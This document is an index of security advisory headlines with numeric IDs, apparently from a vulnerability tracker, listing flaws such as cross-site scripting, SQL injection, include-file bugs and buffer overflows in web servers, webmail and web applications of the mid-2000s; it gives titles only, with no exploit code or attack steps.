[1017549] FreeWebshop Include File Bug in '/includes/login.php' Lets Remote Users Execute Arbitrary Code
[1017525] WebLogic Bugs Let Remote Users Gain Access, Obtain Information, and Deny Service
[1017521] WebLogic Portal Policy Modification Errors May Let Remote Users Access Resources
[1017519] WebLogic Certificate Validation Error May Let Remote Users Access the System in Certain Cases
[1017465] Cisco Clean Access Lets Remote Users Access the Administrative Interface and Download Backup Files
[1017455] AIDeX WebServer Lets Remote Users Deny Service By Sending Multiple Requests
[1017324] Sun Java System Web Proxy Server Lets Remote Users Conduct HTTP Request Smuggling Attacks
[1017323] Sun Java System Web Server Lets Remote Users Conduct HTTP Request Smuggling Attacks
[1017287] MailEnable Grants Administrative Access to .NET WebAdmin Service to Remote Users
[1017271] Mozilla Firefox Password Manager Can Disclose Passwords and Other Form Values to Remote Websites
[1017239] Kerio WebSTAR Lets Certain Local Users Gain Root Privileges
[1017200] FreeWebshop Input Validation Holes Permit Cross-Site Scripting Attacks and Include File Attacks
[1017170] IBM WebSphere Application Server Input Validation Hole in Error Page 'faultactor' Parameter Permits Cross-Site Scripting Attacks
[1017111] Trawler Web CMS Include File Bug in 'path_red2' Parameter Lets Remote Users Execute Arbitrary Code
[1017100] Serendipity Input Validation Flaws in Administration Interface Permit Cross-Site Scripting Attacks
[1017069] IronWebMail IM_FILE Request Lets Remote Users Traverse the Directory
[1017023] WebYep Include File Flaw in 'webyep_sIncludePath' Parameter Lets Remote Users Execute Arbitrary Code
[1016998] Symantec Web Security NAVEX15/NAVENG Device Drivers Let Local Users Gain Kernel Level Privileges
[1016975] Unicenter Web Services Distributed Management Discloses Files to Remote Users
[1016957] Mac OS X WebCore WebKit Memory Management Error Lets Remote Users Execute Arbitrary Code
[1016938] WEB//NEWS Include File Flaw in 'parse/parser.php' Lets Remote Users Execute Arbitrary Code
[1016821] Mono Web Server 'xsp' Component Lets Remote Users Traverse the Directory
[1016789] Web Dictate Lets Remote Users Gain Administrative Access with a Null Password
[1016777] Webmin Input Validation Hole Permits Cross-Site Scripting Attacks and Discloses Script Source Code to Remote Users
[1016766] MaxDB Buffer Overflow in WebDBM Service Lets Remote Users Execute Arbitrary Code
[1016733] Java Web Start May Let Remote Users Exploit Old Vulnerabilities
[1016682] TinyWebGallery Include File Bug in 'image' Parameter Lets Remote Users Execute Arbitrary Code
[1016670] Archangel Weblog Input Validation Holes in 'Name' and 'Comment' Parameters Permit Cross-Site Scripting Attacks
[1016648] GroupWise WebAccess Input Validation Holes in the Login Page and Other Pages Permit Cross-Site Scripting Attacks
[1016637] CA eTrust Antivirus WebScan Buffer Overflow Lets Remote Users Execute Arbitrary Code
[1016596] Sun Java System Web Server UTF-8 URI Mapping Error Lets Remote Users View Certain Files
[1016563] FireWall-1/VPN-1 Input Validation Hole in PKI Web Service Lets Remote Users View Files on the Underlying System
[1016513] IceWarp Web Mail Include File Bug in 'language' and Other Parameters Lets Remote Users Execute Arbitrary Code
[1016476] Cisco Router Web Setup Tool Uses an Unsafe IOS Router Configuration By Default
[1016463] Webvizyon Portal Input Validation Flaw in 'ID' Parameter Lets Remote Users Inject SQL Commands
[1016454] MIMEsweeper for Web Input Validation Hole in 'Access Denied' Page Permits Cross-Site Scripting Attacks
[1016446] WebEx Downloader Lets Remote Users Download and Execute Arbitrary Files
[1016435] PhpWebGallery Input Validation Flaw in 'comments.php' Permits Cross-Site Scripting Attacks
[1016375] Webmin for Windows Error in Parsing '\' Backslash Character Permits Directory Traversal Attacks
[1016341] WeBBoA Hosting Script Input Validation Flaw Lets Remote Users Inject SQL Commands
[1016334] Mambo Server Input Validation Hole in 'Weblinks' Module Lets Remote Users Inject SQL Commands
[1016280] Microsoft Outlook Web Access Input Validation Hole Permits Cross-Site Scripting Attacks
[1016276] Cabacos Web CMS Input Validation Hole in Search Form Permits Cross-Site Scripting Attacks
[1016268] LogiSphere Web Service Input Validation Hole Permits Cross-Site Scripting Attacks
[1016252] Cisco WebVPN Input Validation Hole in 'dnserror.html' Permits Cross-Site Scripting Attacks
[1016197] F-Secure Internet Gatekeeper Buffer Overflow in Web Console May Let Remote Users Execute Arbitrary Code
[1016196] F-Secure Anti-Virus for Microsoft Exchange Buffer Overflow in Web Console May Let Remote Users Execute Arbitrary Code
[1016179] WebCalendar Include File Bug in 'includes/config.php' Lets Remote Users Execute Arbitrary Code
[1016160] V-webmail Include File Bug in 'pear_dir' Parameter Lets Remote Users Execute Arbitrary Code
[1016143] Apple Xcode Tools Grants Remote Access to WebObjects Projects
[1016133] Fujitsu MyWeb Product Line Input Validation Flaw Permits SQL Injection Attacks
[1016125] Sun Java System Web Server Default Error Page Input Validation Hole Permits Cross-Site Scripting Attacks
[1016116] Spymac Web OS Multiple Input Validation Holes Permit Cross-Site Scripting Attacks
[1016110] Resin Input Validation Flaw in Documentation Viewer Lets Remote Users Traverse the Web Root Directory
[1016109] Resin Input Validation Flaw in the Built-in Web Server Lets Remote Users Traverse the Directory By Specifying an Absolute Path
[1016103] WebLogic Server JTA Transactions May Be Sent Unencrypted
[1016102] WebLogic Server Quality of Service Error Causes Transaction Coordinator Messages to Be Sent Unencrypted
[1016101] WebLogic Server Admin Password Reset Mechanism May Disclose the Password to Local Users
[1016100] WebLogic JSP Compilation Error May Allow Remote Users to View JSP Source Code
[1016099] WebLogic Server Console Displays the Domain Name Prior to Authentication
[1016098] WebLogic Server Records Failed User Passwords in the Server Log File
[1016097] WebLogic Server May Incorrectly Remove JDBC Security Policies
[1016096] WebLogic Server May Disclose Internal Network Addresses
[1016095] WebLogic Server May Let Applications Obtain Private Keys
[1016094] WebLogic 'stopWebLogic.sh' Displays the Administrative Password When Typed By the Administrator
[1016040] Cisco PIX Firewall Lets Remote Users Bypass Websense Content Filtering With Fragmented Requests
[1016039] Cisco Firewall Service Module (FWSM) Lets Remote Users Bypass Websense Content Filtering With Fragmented Requests
[1016038] D-Link DSL-G604T Wireless Router Bug in 'webcm' Script in 'getpage' Parameter Lets Remote Users Traverse the Directory
[1016027] Web4Future News Portal Input Validation Holes Permit SQL Injection and Cross-Site Scripting Attacks
[1015960] Neuron Blog Input Validation Holes in 'name' and 'website' Parameters Let Remote Users Conduct Cross-Site Scripting Attacks
[1015942] phpWebSite Include File Bug in 'hub_dir' Parameter May Let Remote Users Execute Arbitrary Code
[1015878] Aweb's Scripts Seller Lets Remote Users Bypass Authorization and Download Files Without Paying
[1015877] Aweb's Banner Generator Input Validation Hole in 'banner' Parameter Permits Cross-Site Scripting Attacks
[1015861] McAfee WebShield Format String Bug in Composing Bounce Messages Lets Remote Users Execute Arbitrary Code
[1015857] IBM WebSphere Lets Remote Users Deny Service By Sending Large HTTP Header Values
[1015818] Maian Weblog Input Validation Bugs in 'print.php' and 'mail.php' Permit SQL Injection
[1015792] WebLogic Server Default Internal Servlet May Let Remote Users Access the Local File System
[1015791] WebLogic Portal May Disclose a User's JSR-168 Portlet Contents
[1015790] WebLogic XML Document Parsing Memory Error Lets Remote Users Deny Service
[1015716] IBM WebSphere Application Server May Disclose JavaServer Pages Source to Remote Users
[1015702] SAP Web Application Server Lets Remote Users Inject Data into HTTP Responses
[1015689] Archangel Weblog Authentication Weakness Lets Remote Users Gain Administrator Privileges
[1015648] Xerox WorkCentre Multiple Bugs in ESS/Network Controller and MicroServer Web Server Permit Remote Access, Denial of Service, and Cross-Site Scripting Attacks
[1015630] Microsoft Windows Web Client Buffer Overflow Lets Remote Authenticated Users Execute Arbitrary Code
[1015610] IBM Domino Web Access Input Validation Flaws Permit Cross-Site Scripting Attacks
[1015597] Java Web Start Bug Lets Remote Applets Gain Privileges on the Target User's System
[1015582] IBM Tivoli Access Manager Input Validation Hole in Web Server Plug-in 'pkmslogout' Script Lets Remote Authenticated Users Traverse the Directory
[1015528] BEA WebLogic Multiple Bugs Let Remote Users Deny Service, Obtain Information, and Access Restricted Resources
[1015522] WebspotBlogging Input Validation Hole in 'login.php' Permits SQL Injection Attacks
[1015459] Microsoft Windows Embedded Web Fonts Buffer Overflow Lets Remote Users Execute Arbitrary Code
[1015450] TheWebForum Input Validation Holes Permit SQL Injection and Cross-Site Scripting Attacks
[1015443] Apple AirPort Base Station Lets Remote Users Deny Service on the Network Interface
[1015434] Linux Kernel sysctl() Interface Unregistration Error Lets Local Users Deny Service
[1015431] Open-Xchange Web Mail Input Validation Hole Permits Cross-Site Scripting Attacks
[1015428] BlackBerry Web Browser Bug in Processing JAD Files Lets Remote Users Deny Service
[1015422] VMware ESX Server Input Validation Flaw in Management Interface Log Viewer Permits Cross-Site Scripting Attacks
[1015412] IceWarp Web Mail Multiple Include File Bugs Let Remote Users Execute Arbitrary Code
[1015410] DEV web management system Input Validation Holes Permit SQL Injection and Cross-Site Scripting Attacks
[1015360] IBM WebSphere Input Validation Flaws in Certain Sample Scripts Permit Cross-Site Scripting Attacks
[1015355] BusinessObjects Web Intelligence Lets Remote Users Lock Out Arbitrary Accounts
[1015350] Microsoft Internet Explorer Bug in Using HTTPS Proxies May Disclose Web URLs to Remote Users
[1015336] HP Secure Web Server for Tru64 UNIX XMLRPC Bug Lets Remote Users Execute Arbitrary PHP Code
[1015335] Website Baker Username Input Validation Error Lets Remote Users Inject SQL Commands
[1015331] Sun Solaris Sun Update Connection Services May Disclose Web Proxy Password to Local Users
[1015301] FreeWebStat Input Validation Holes Permit Cross-Site Scripting Attacks
[1015294] Apple Safari WebKit Buffer Overflow May Let Remote Users Execute Arbitrary Code and Other Bugs May Permit JavaScript Dialog Box Spoofing and File Download Location Modification
[1015255] IBM WebSphere on z/OS Double-Free Bug Lets Remote Users Crash the Service
[1015234] LiteSpeed Web Server Input Validation Flaw in 'confMgr.php' Permits Cross-Site Scripting Attacks
[1015174] SAP Web Application Server Input Validation Holes Permit HTTP Response Splitting, Cross-Site Scripting, and Phishing Attacks
[1015164] Asterisk Web-Voicemail Discloses Voicemail Messages to Remote Authenticated Users
[1015143] F-Secure Anti-Virus for Microsoft Exchange Web Console May Disclose Files to Remote Users
[1015142] F-Secure Internet Gatekeeper Web Console May Disclose Files to Remote Users
[1015134] IBM WebSphere Session Manager Tracing May Disclose Potentially Sensitive Information
[1015117] RockLiffe MailSite Express WebMail Discloses WebMail Files to Remote Users and Permits Cross-Site Scripting Attacks
[1015105] RSA ACE/Agent for Web Input Validation Error in 'image' Parameter Lets Remote Users Conduct Cross-Site Scripting Attacks
[1015089] eBASEweb Input Validation Flaw Permits SQL Injection Attacks
[1015083] Symantec LiveUpdate Java Interface Lets Local Users Gain Elevated Privileges
[1015046] GFI MailSecurity Web Module Buffer Overflow in Processing HTTP Headers Lets Remote Users Execute Arbitrary Code
[1015040] Microsoft Windows Shell Bugs in Processing '.lnk' Files and in Web View Preview Mode Let Remote Users Execute Arbitrary Code
[1015029] BEA WebLogic Server Multiple Bugs Let Remote Users Deny Service, Obtain Information, and Conduct Cross-Site Scripting Attacks
[1015012] Webroot Desktop Firewall Lets Local Users Gain Elevated Privileges or Disable the Firewall
[1015001] Symantec Anti Virus Scan Engine Buffer Overflow in Web Service Lets Remote Users Execute Arbitrary Code
[1014993] Virtools Web Player Buffer Overflow and Directory Traversal
[1014964] Apple Safari Web Archive Feature Lets Remote Users Conduct Cross-Site Scripting Attacks
[1014951] Webmin Input Validation Error in Processing PAM Authentication Lets Remote Users Execute Arbitrary Commands
[1014928] Spymac Web OS Input Validation Weakness in 'showthread.php' Permits Cross-Site Scripting Attacks
[1014910] vxWeb Can Be Crashed By Remote Users
[1014900] Content2Web Lets Remote Users Inject SQL Commands, Conduct Cross-Site Scripting Attacks, and Include Local Files
[1014898] Sun Java Application Server Discloses Web Application Jar File Contents to Remote Users
[1014894] Linksys WRT54G Router Administration Interface Bugs Let Remote Users Modify the Configuration, Execute Arbitrary Code, or Deny Service
[1014883] Spymac Web OS Input Validation Hole in 'category' Parameter Permits Cross-Site Scripting Attacks
[1014875] Sun Java Web Proxy Server Error in Processing Certain POST Requests May Let Remote Users Deny Service
[1014867] WebArchiveX 'Safe for Scripting' Setting Lets Remote Users Read and Write Files
[1014866] WEB//NEWS Input Validation Hole in 'modules/startup.php' Lets Remote Users Inject SQL Commands
[1014856] SqWebMail Lets Remote Users Inject Scripting Code via 'Conditional Comments'
[1014849] WebCalendar Include File Bug in 'includedir' Parameter Lets Remote Users Execute Arbitrary Code
[1014829] Microsoft Windows Firewall User Interface May Not Properly Display Exception Rules
[1014810] SqWebMail Bug in Filtering IMG Tags Lets Remote Users Inject Arbitrary Scripting Code
[1014807] phpWebNotes Include File Error in 'php_api.php' Lets Remote Users Execute Arbitrary Commands
[1014759] WebLogic Portal Access Control Flaw May Grant Remote Users Access to Entitled Pages
[1014757] Cisco Intrusion Prevention System Command Line Interface Bug Lets Authenticated Users Gain Elevated Privileges
[1014748] SaveWebPortal Include File Bug Lets Remote Users Execute Arbitrary Code and Authentication Flaw Grants Administrative Access
[1014720] Xerox Document Centre MicroServer Web Server Bugs Let Remote Users Bypass Authentication, View Files, and Deny Service
[1014716] phpWebSite Input Validation Hole in 'Module' Parameter Permits SQL Injection
[1014707] Apple Mac OS X SecurityInterface May Disclose Passwords to Authenticated Administrators
[1014699] HIToolbox May Disclose Secure Information via the VoiceOver Interface
[1014694] Apple Weblog Server Input Validation Hole Permits Cross-Site Scripting Attacks
[1014641] Microsoft Internet Explorer Web Folder URL Validation Bug Lets Remote Users Execute Scripting Code in an Arbitrary Security Domain
[1014628] Acunetix Web Vulnerability Scanner Web Sniffer Can Be Crashed By Remote Users
[1014624] NetworkActiv Web Server Input Validation Flaw Permits Cross-Site Scripting Attacks
[1014616] 'web content management' Lets Remote Users Add Administrative Accounts or Conduct Cross-Site Scripting Attacks
[1014590] McAfee WebShield Appliance Default Password May Grant Access to Remote Users
[1014582] SPI Dynamics WebInspect Reporting Function Lets Remote Sites Execute Scripting Code on the Target System
[1014559] KF Web Server Discloses Directory Listings to Remote Users
[1014535] Website Generator Image Upload Preview Lets Remote Users Execute Arbitrary Code
[1014515] Novell GroupWise Webaccess Lets Remote Users Conduct Cross-Site Scripting Attacks
[1014480] Web-Portal-System 'wps_shop.cgi' Remote Command Execution
[1014456] MIMEsweeper for Web May Let Remote Code Bypass the Portable Code Manager
[1014441] nCipher Cryptographic Hardware Interface Library (CHIL) Discloses Random Cache to Forked Processes
[1014429] Xerox WorkCentre Pro Web Service Lets Remote Users Bypass Authentication, Obtain Files, Modify Web Pages, or Deny Service
[1014417] Microsoft Windows Named Pipe NULL Session Bugs in svcctl and eventlog RPC Interfaces Disclose Information to Remote Users
[1014385] ASPWebMail Discloses Database to Remote Users
[1014369] SunONE Web Server May Allow Remote Users to Conduct HTTP Response Smuggling Attacks
[1014368] Oracle Application Server Web Server May Allow Remote Users to Conduct HTTP Response Smuggling Attacks
[1014367] IBM WebSphere May Allow Remote Users to Conduct HTTP Response Smuggling Attacks
[1014366] BEA WebLogic May Allow Remote Users to Conduct HTTP Response Smuggling Attacks
[1014360] Oracle Application Server Web Cache Lets Remote Users Conduct HTTP Request Smuggling Attacks
[1014358] Sun Java System Web Proxy Server Lets Remote Users Conduct HTTP Request Smuggling Attacks
[1014357] Check Point FireWall-1 HTTP Request Smuggling May Let Remote Users Bypass Web Intelligence Features
[1014352] Microsoft Front Page May Crash When Editing a Specially Crafted Web Page
[1014268] Asterisk Buffer Overflow in Manager Interface Lets Remote Authenticated Users Execute Arbitrary Code
[1014235] Sun ONE Messaging Server Lets Remote Users Execute Arbitrary Code on a Target Webmail User's System
[1014231] Yaws Web Server Discloses Script Source Code to Remote Users
[1014199] Microsoft Outlook Web Access Input Validation Hole in IMG Tags Permits Cross-Site Scripting Attacks
[1014196] Microsoft Windows Buffer Overflow in Web Client Service Lets Remote Authenticated Users Execute Arbitrary Code
[1014191] Java Web Start java-vm-args Lets Remote Users Access and Execute Files on the Target User's System
[1014173] WebHints Input Validation Bug Lets Remote Users Execute Arbitrary Commands
[1014135] Cisco 802.1x Voice-Enabled Interfaces Grant Anonymous Voice VLAN Access
[1014132] IBM AIX Buffer Overflows in invscout, paginit, diagTasksWebSM, getlvname, and swcons Commands and Multiple p Commands Let Local Users Execute Arbitrary Code
[1014123] IBM WebSphere Application Server Buffer Overflow in Administrative Console Lets Remote Users Execute Arbitrary Commands
[1014104] WWWeb Concepts Events System 'login.asp' Input Validation Hole Permits SQL Injection
[1014096] LiteWeb Lets Remote Users Access Restricted Pages
[1014049] BEA WebLogic Server and WebLogic Portal Have Multiple Vulnerabilities
[1014048] MaxWebPortal Input Validation Hole in 'password.asp' Permits SQL Injection
[1014027] Gentoo webapp-config Unsafe Temporary File Lets Local Users Gain Elevated Privileges
[1013979] Sigma ISP Manager Input Validation Flaw in 'sigmaweb.dll' Permits SQL Injection
[1013945] Windows Media Player License Acquisition Feature May Let Remote Users Redirect Users to Arbitrary Web Pages
[1013940] Guestbook PRO for WebAPP Input Validation Holes in Content and Title Let Remote Users Conduct Cross-Site Scripting Attacks
[1013932] MaxWebPortal Has Additional Input Validation Holes in Multiple Scripts That Permit SQL Injection and Grant Remote Administrative Access
[1013902] Jeuce Personal Web Server Can Be Crashed By Remote Users
[1013859] Open WebMail Input Validation Hole Prior to open() Call Lets Remote Users Execute Arbitrary Commands
[1013845] MaxWebPortal Has Input Validation Holes in Multiple Scripts That Permit SQL Injection and Grant Remote Administrative Access
[1013836] JustWilliam's Amazon Webstore Input Validation Holes Permit Cross-Site Scripting Attacks
[1013821] MaxDB Buffer Overflow in getIfHeader() WebDAV Function Lets Remote Users Execute Arbitrary Code
[1013817] BEA WebLogic Administration Console Input Validation Hole in 'JndiFramesetAction' Permits Cross-Site Scripting Attacks
[1013802] SqWebMail Input Validation Hole in 'redirect' Parameter Permits HTTP Response Splitting Attacks
[1013800] MaxDB Buffer Overflow in getLockTokenHeader() WebDAV Function Lets Remote Users Execute Arbitrary Code
[1013791] Novell Nsure Audit 'webadmin.exe' Lets Remote Users Cause the System to Stop Responding
[1013761] Microsoft Windows Explorer 'webvw.dll' Input Validation Error Lets Remote Users Execute Arbitrary Scripting Code
[1013757] WheresJames Webcam Publisher Buffer Overflow Lets Remote Users Execute Arbitrary Code
[1013753] WebcamXP Lets Remote Users Redirect Chat Sessions and Deny Service
[1013748] PMSoftware Simple Web Server Buffer Overflow Lets Remote Users Execute Arbitrary Code
[1013724] RSA Authentication Agent for Web for IIS Input Validation Bug Lets Remote Users Conduct Cross-Site Scripting Attacks
[1013723] Webmin May Let Users Change the Permissions and Ownership of Configuration Files
[1013708] Kerio MailServer WebMail Viewing Flaw Lets Remote Users Deny Service
[1013697] IBM WebSphere May Disclose JSP Source to Remote Users Sending Invalid Host Headers
[1013669] Microsoft Outlook Web Access 'From' Address Display Lets Remote Users Spoof Origination Addresses
[1013633] Turnkey Websites Shopping Cart Input Validation Bugs Let Remote Users Inject SQL Commands
[1013617] MaxWebPortal Input Validation Holes in 'events_functions' and 'links_add_form' Permit SQL Injection and Cross-Site Scripting Attacks
[1013598] WebAPP Discloses 'dat' Files to Remote Users
[1013465] McAfee WebShield Buffer Overflow in Processing LHA Headers Lets Remote Users Execute Arbitrary Code
[1013435] IBM WebSphere Commerce May Disclose Login IDs and Other Information to Remote Users
[1013430] MaxDB Web Agent Can Be Crashed By Remote Users Sending Invalid DBM Parameters
[1013411] WEBinsta Limbo Include File Flaw Lets Remote Users Execute Arbitrary Commands
[1013409] WEBinsta Website Mailing list manager Include File Flaw Lets Remote Users Execute Arbitrary Commands
[1013397] phpWebLog Include File Flaw Lets Remote Users Execute Arbitrary Commands
[1013388] Xerox WorkCentre Bug in Web Server Lets Remote Users Modify the Configuration
[1013335] WebMod Buffer Overflow in Processing POST Requests May Let Remote Users Execute Arbitrary Code
[1013312] CIS WebServer Discloses Files Outside of the Document Directory to Remote Users
[1013298] phpWebSite Announce Module Image Files Let Remote Users Execute Arbitrary PHP Code
[1013248] Xinkaa WEB Station Discloses Files Outside of the Document Directory to Remote Users
[1013245] WebConnect Discloses Files to Remote Users and Can Be Crashed By Remote Users
[1013231] WebCalendar user_valid_crypt function() Input Validation Error Lets Remote Users Inject SQL Commands
[1013178] PHP-Nuke Input Validation Holes in Downloads 'newdownloadshowdays' and Web Links 'newlinkshowdays' Permit Cross-Site Scripting Attacks
[1013177] BEA WebLogic Discloses the Reason for Authentication Failure to Remote Users
[1013172] Open WebMail Input Validation Flaw in 'logindomain' Lets Remote Users Conduct Cross-Site Scripting Attacks
[1013099] OmniWeb IDN Implementation Lets Remote Users Spoof URLs and SSL Certificates
[1013086] Microsoft Outlook Web Access 'owalogon.asp' Lets Remote Users Redirect Login Requests
[1013046] Eternal Lines Web Server Lets Remote Users Deny Service With Multiple Simultaneous Connections
[1013038] WebAdmin useredit_account.wdm Permits Cross-Site Scripting Attacks and Lets Remote Authenticated Users Access Other Accounts
[1013036] WebWasher Classic Lets Remote Users Connect to Localhost Ports
[1013017] Magic Winmail Server Input Validation Holes in Webmail and IMAP Services Allow Directory Traversal Attacks
[1013015] Cisco IOS MPLS Disabled Interfaces Let Remote Users Deny Service
[1012988] SquirrelMail Input Validation Flaw in webmail.php May Let Remote Users Execute Arbitrary Commands or Conduct Cross-Site Scripting Attacks
[1012928] Novell GroupWise WebAccess Lets Remote Users Bypass Authentication to Gain Limited Access
[1012893] MySQL MaxDB Buffer Overflow in websql Password Parameter Lets Remote Users Execute Arbitrary Code
[1012855] eMotion MediaPartner Web Server Discloses BHTML Source Code to Remote Users
[1012854] Bottomline WebSeries Discloses Information to Remote Authenticated Users and Lets Users Bypass Password Policy
[1012796] Dillo Format String Flaw in a_Interface_msg() May Let Remote Users Execute Arbitrary Code
[1012791] Jeuce Personal Web Server Discloses Files to and Can Be Crashed by Remote Users
[1012745] KorWeblog 'install/index.php' Include File Flaw Lets Remote Users Execute Arbitrary Code
[1012676] Picosearch Input Validation Flaw Lets Remote Users Spoof Web Site Contents
[1012657] e107 website system Include File Flaw in ImageManager Lets Remote Users Execute Arbitrary Code
[1012603] uml_utilities umt_net slip_down() Lets Local Users Disable the Ethernet Interfaces
[1012585] Sun ONE Messaging Server Bug in Webmail Lets Remote Users Access E-mail Accounts
[1012579] pgn2web Buffer Overflow in process_moves() Lets Remote Users Execute Arbitrary Code
[1012537] iWebNegar Input Validation Bug Lets Remote Users Inject SQL Commands
[1012505] Sun Java System Web Server Lets Remote Users Access Active Sessions
[1012451] WebLibs Discloses Text Files to Remote Users
[1012449] MaxDB WebTools WebDav Stack Overflow Lets Remote Users Execute Arbitrary Code With Root Privileges
[1012312] KorWeblog Input Validation Error in 'viewing.php' Lets Remote Users Obtain Directory Listings
[1012305] NuKed-KlaN Input Validation Hole in Web Site Links Permits Cross-Site Scripting Attacks
[1012226] Webroot Spy Sweeper Enterprise Discloses Administrative Password to Local Users
[1012200] phpWebSite Input Validation Flaws Let Remote Users Conduct HTTP Response Splitting Attacks
[1012173] 04WebServer Input Validation Holes Let Remote Users Inject Log Entries and Conduct Cross-Site Scripting Attacks
[1012168] WebCalendar Grants Administrative Access and Permits Cross-Site Scripting and HTTP Response Splitting Attacks
[1012166] Cisco IOS Interfaces Can Be Blocked With Specially Crafted DHCP Packets
[1012159] Sun ONE Messaging Server Lets Remote Users Hijack Webmail Accounts
[1012158] NETGEAR DG834 Management Interface Can Be Blocked With Many Simultaneous Sessions
[1012155] Microsoft Internet Security and Acceleration Server Reverse DNS Caching Bug Lets Remote Users Spoof Web Sites
[1012154] Microsoft Proxy Server Reverse DNS Caching Bug Lets Remote Users Spoof Web Sites
[1012099] Merak Mail Server (with IceWarp Web Mail) Lets Remote Authenticated Users Move, Delete, and Rename Files
[1012083] Apache Web Server Error in Processing Requests With Many Space Characters Lets Remote Users Deny Service
[1012077] MailEnable Webmail Vulnerability Has Unspecified Impact
[1012060] Sun Java System Web Server Various Certificate and ASN.1 Bugs Let Remote Users Crash the Service
[1012048] Forum Web Server Still Discloses Files on the System, Including Clear Text Passwords, to Remote Users
[1012005] Sun Java System Web Proxy Server Buffer Overflow May Let Remote Users Execute Arbitrary Code
[1011997] Caudium Web Server Off-by-One Error May Let Remote Users Execute Arbitrary Code
[1011986] Cyber Web Filter IP Address Web Blocking Can Be Bypassed
[1011962] OmniWeb Browser Multi-Window Browsing Errors Let Remote Users Spoof Sites
[1011877] cPanel Webmail Only Requires First Eight Characters of Password
[1011812] Abyss Web Server Bug in Processing MS-DOS Device Names Lets Remote Users Deny Service
[1011792] Netscape Web Mail 'msglist.adp' Input Validation Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
[1011791] AOL Web Mail 'msglist.adp' Input Validation Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
[1011633] Microsoft IIS WebDAV XML Message Handler Error Lets Remote Users Deny Service
[1011618] IceWarp Web Mail Has Cross-Site Scripting Flaws and an Unspecified 'view.html' Vulnerability
[1011550] Express-Web Input Validation Error Lets Remote Users Conduct Cross-Site Scripting Attacks
[1011541] NetworkActiv Web Server Lets Remote Users Deny Service
[1011462] aspWebCalendar Discloses Whether Account Names Exist to Remote Users
[1011461] MyWebServer Grants Administrative Access and Discloses Files to Remote Users
[1011422] Web Wiz Journal Discloses Database to Remote Users
[1011421] Web Wiz Internet Search Engine Discloses Database to Remote Users
[1011411] aspWebAlbum Input Validation Holes Let Remote Users Inject SQL Commands
[1011410] aspWebCalendar Input Validation Holes Let Remote Users Inject SQL Commands
[1011346] Business Objects WebIntelligence Input Validation Holes Let Remote Users Conduct Cross-Site Scripting Attacks
[1011345] Business Objects WebIntelligence Access Control Lets Remote Authenticated Users Delete Documents Without Permission
[1011334] DNS4Me Lets Remote Users Crash the Web Service and Conduct Cross-Site Scripting Attacks
[1011268] Webmin 'maketemp.pl' Unsafe Temporary Directory Lets Local Users Gain Elevated Privileges
[1011235] Pingtel xpressa Boundary Error in HTTP Management Interface Lets Remote Authenticated Users Crash the Phone
[1011234] WebLogic May Transmit Sensitive Information in Clear Text When the Administration Port is Not Enabled
[1011233] WebLogic Active Directory LDAP Error May Fail to Disable User Accounts
[1011232] WebLogic Server May Deploy With Incomplete Security When an Error Occurs During Deployment
[1011231] WebLogic Discloses System Version Information to Remote Users
[1011230] WebLogic Administrative Console May Display Passwords in Certain Cases
[1011229] WebLogic Command and Administrative Scripts May Contain Clear Text Passwords
[1011228] WebLogic Case-Sensitive 'web.xml' Patterns May Let Remote Users Access Restricted URLs
[1011227] WebLogic Server Lets Remote Users Execute Some Administration Commands
[1011226] BEA WebLogic May Disclose Some Internal Server Objects to Remote Users
[1011173] Usermin Web Mail HTML Filtering Flaw Lets Remote Users Execute Arbitrary OS Commands
[1011120] phpWebSite Input Validation Bugs in 'cal_template' and Other Parameters Permit SQL Injection and Cross-Site Scripting Attacks
[1011092] Xedus Web Server Input Validation Flaws Disclose Files to Remote Users and Permit Cross-Site Scripting Attacks
[1011073] Dynix WebPAC Input Validation Holes Let Remote Users Inject SQL Commands
[1011065] Cisco Secure Access Control Server Lets Remote Users Access the Administrative Interface or Deny Service
[1011053] WebAPP Input Validation Flaw Lets Remote Users View Arbitrary Files
[1011052] Webroot Window Washer Does Not Properly Overwrite Erased Files
[1011048] Webmatic Security Flaw Has Unspecified Impact
[1011045] Easy File Sharing Web Server Discloses All Files on the Disk to Remote Users
[1011012] Novell Web Manager May Grant Remote Users Access to the WEB-INF Folder
[1011010] Nihuo Web Log Analyzer Lack of Input Validation in User-Agent and Referer Fields Permits Cross-Site Scripting Attacks
[1011007] BadBlue Web Server Service Can Be Denied With Multiple Connections from the Same Host
[1010933] Clearswift MIMEsweeper for Web Discloses Files to Remote Users
[1010932] KDE Temporary File Bugs Let Local Users Gain Elevated Privileges and Frame Injection Flaw Lets Remote Users Spoof Web Sites
[1010916] Microsoft Outlook Web Access Input Validation Hole in Redirection Query Permits Cross-Site Scripting Attacks
[1010904] Apple Safari May Disclose Web Form POST Data to Remote Servers Via GET Methods
[1010851] Free Web Chat Username Input Validation Error Lets Remote Users Deny Service
[1010835] Webbsyte Chat Can Be Crashed By Remote Users
[1010824] Webcam Watchdog Input Validation Hole in 'sresult.exe' Permits Cross-Site Scripting Attacks
[1010797] IBM WebSphere Can Be Crashed By Remote Users Sending Large HTTP Headers
[1010780] Opera Web Browser Javascript 'location.replace' Lets Remote Users Spoof Address Bar
[1010774] Firefox State Error Lets Remote Server Spoof Arbitrary Secure Web Sites
[1010768] EasyWeb FileManager Discloses Files to Remote User
[1010753] Samba Buffer Overflows in Web Administration Tool and in 'hash' Mangling Method May Let Remote Users Execute Arbitrary Code
[1010751] Xitami Web Server Can Be Crashed By Remote Users Sending Invalid HTTP Headers
[1010727] eXtropia WebStore Input Validation Bug Lets Remote Users Execute Arbitrary Commands
[1010696] 4D WebSTAR Grants Access to Remote Users and Elevated Privileges to Local Users
[1010680] INweb Mail Lets Remote Users Deny Service By Multiple Connections in Rapid Succession
[1010639] IBM WebSphere Edge Server Component Caching Proxy JunctionRewrite Directive Lets Remote Users Deny Service
[1010631] Enceladus Server Suite Input Validation Error in Web Service Discloses Files and Directory Listings to Remote Users
[1010613] Pavuk Buffer Overflow in Processing HTTP Location Headers Lets Remote Web Servers Execute Arbitrary Code on the Target System
[1010610] Microsoft IIS Web Server May Disclose Private IP Addresses in Certain Cases
[1010607] HP Object Action Manager WebAdmin Flaw May Yield Access to Remote Users
[1010605] Open WebMail Input Validation Flaw in 'vacation.pl' Lets Remote Users Execute Arbitrary Programs
[1010602] BEA WebLogic role-name Tag Error May Let Remote Users Access Applications
[1010593] Infinity WEB Input Validation Error Lets Remote Users Inject SQL Commands
[1010568] ArbitroWeb Input Validation Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
[1010560] SqWebMail Input Validation Bug in print_header_uc() Lets Remote Users Conduct Cross-Site Scripting Attacks
